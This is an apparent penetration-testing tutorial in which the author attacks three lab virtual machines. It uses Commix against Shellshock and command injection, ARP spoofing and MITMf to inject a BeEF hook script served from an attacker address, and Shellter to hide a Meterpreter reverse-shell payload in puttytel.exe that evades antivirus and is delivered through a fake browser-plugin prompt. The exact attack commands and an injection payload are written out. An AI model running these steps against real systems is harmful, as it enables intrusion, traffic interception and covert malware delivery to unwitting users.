Introduction to Command and Shell Code Injection Scenarios with Commix and Shellter:
This virtual yet realistic scenario was created to demonstrate some exploitation techniques using my favorite tools. We will exploit the web application command injection and Shellshock vulnerability using the Commix tool created by @ancst. In addition, we will use beEF to exploit the web browser and the Shellter project by kyREcon, which is the most advanced PE/Shellcode Injector ever created – yes, you probably haven’t heard of it.This article was written while enjoying – cappuccino – coffee in Monastiraki, Athens. I tried to make it as technical as possible while still trying to create a funny and informative story. Of course, no one was harmed in Monastiraki during this article. Instead, several virtual machines were created to replace the cafe’s clients. At the end of this article you will find all the configurations and scripts I used available. Make sure to upgrade them!
So by running the three virtual machines I’ve already set up. I continued to discover their IP.
I was able to determine the IP of each virtual machine by running the following command:
$ nmap -sn 192.168.1.0/24
Since the first IP belongs to the router, let’s start exploring the second host with IP 192.168.1.5.
There were no firewalls or IPS/IDS set up so we can do an Aggressive Nmap Scan.
$ sudo nmap -A 192.168.1.5
By accessing the web server we are redirected to: http://192.168.1.5/cgi-bin/notvulnerable.cgi
What is the first thing that comes to mind when we find a CGI file available on a web server? That’s right, Shellshock! To use it, I will use the Commix tool I mentioned earlier. Commix comes with a pre-installed plugin that allows us to perform a Command Injection attack once we find the Shellshock vulnerability.
Of course, we can first manually test if there really is a Shellshock vulnerability, but we don’t have to worry about that because Commix will also notify us. For this specific use of Shellshock, Commix will parse the payload via the User-Agent header.
The command I executed:
$ python commix.py –shellshock –url=”http://192.168.1.5/cgi-bin/notvulnerable.cgi”
And here is the result:
As you can see, we are able to execute commands against the target system. Of course, Commix informed us of the payload used to execute the command.
We can also see what the request looks like from Wireshark. Please see the User-Agent header.
Now we will move to our second virtual machine lab with IP 192.168.1.68. By performing a port scan, we can see that the web server is available. When we view it, we see something like this:
Let’s test it to see how it works. Specifying /var/www/html as the path gives the following result:
Let’s use Commix again to see if a web application is vulnerable to code injection attacks. For the sake of order, as you will see in the application code, I have blacklisted several characters to prevent the code from being inserted. What really caught my eye is that I also blacklisted the “$” character, but Commix still managed to abuse the app.
The command I used:
$ python commix.py –url=”http://192.168.1.68/index.php?command=test”
And the result:
Again you can see the applied load. In this case it was: “%0aecho VZYDSK>/var/www/html/VZYDSK.txt”.
As we have seen, Commix is a powerful Command Injection tool. There are many cases where you can use this and it would be impossible to cover them all in one article. More usage examples can be found here.
Now we move to our final destination host, 192.168.1.109. From the Aggressive scan, we can guess that the target is a simple host with no special services running. We can also see that it runs on Windows 10 distribution.
Assuming that the host is being used by an active user, I performed an ARP Spoof attack to see its activity. The commands I used were:
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ arpspoof -t 192.168.1.109 192.168.1.1 -i wlan0
And then I used Wireshark to view the web pages the user was browsing. Of course, it can also find out which websites the victim is visiting using tools like urlsnarf. After a while I caught this request:
I have seen HTTP requests to this website www.4stoixeia.gr several times, so I decided to insert a BeEF hook script into the user’s browser.
This task can be achieved in several ways. For the simplicity of this article, I stopped the ARP Spoof attack I started earlier and used MITMf
perform a MITM attack. It is important to run “beef-xss” before running MITMF
script. In the Kali box you can run:
$ beef-xss
Back to MITMF, I also used the –js-url parameter to specify the script I wanted to embed:
$ mitmf –spoof –arp –inject –target=192.168.1.109 –gateway=192.168.1.1 –js-url=”http://192.168.1.111:3000/hook.js” -i eth1
Now when a MITM attack is going on, we have to wait for the victim to reach any web page. After a while my BeEF window looked like this:
However, this is not enough. I wanted to get a reverse shell on the target machine. What I did was select the “Fake Notification Bar” plugin provided by BeEF, which tells the victim to download some important plugins for their browser. The problem was finding a good way to embed my shellcode. There may be a firewall and anti-virus application on the target computer that I didn’t want to point out.
After much research, I found that the most secret way to do this is with a powerful tool called Shellter. Shellter provides a beautiful solution when we need to inject shellcode into Windows applications. As I mentioned before, it is the most advanced PE infector/Shellcode Injector ever created.
First, I used the Meterpreter reverse_tcp payload and loaded it into the Metasploit utility, which I then ran.
I then downloaded puttytel into which I would put my shellcode with Shellter. Of course, you can use any program you want. This is just an example that shows how to insert shellcodes using Shellter. I then ran Shellter using Wine and configured my malicious file:
Here I used automatic operation mode. PE Target is the location of the file where we would like to put our shellcode. For this example it was puttytel.exe.
I also used Stealth Mode here. Additionally, I used the Meterpreter_Reverse_TCP payload and configured it accordingly. Our malicious file is now called “puttytel.exe”. Shellter saved the official file called “puttytel.exe.bak”.
Now that we have a malicious file with an embedded payload, let’s go back to BeEF and run the Fake Notification plugin.
As you can see, we force the victim to download the embedded file. This is what the victim’s screen will look like after running the plugin:
Assuming the victim downloads and runs the “plugin” and thus our embedded program, we’ll see something like this:
What’s really amazing is that the user will see that the program is running normally:
Even with AV enabled, we managed to get a reverse shell.
As you’ve seen, both Commix and Shellter are powerful tools that I really recommend you start using. Of course, you should ONLY use them for educational purposes. You should never use them to damage someone else’s property.
Here are the simple vulnerable apps I created for this article:
Github: Vulnerable Apps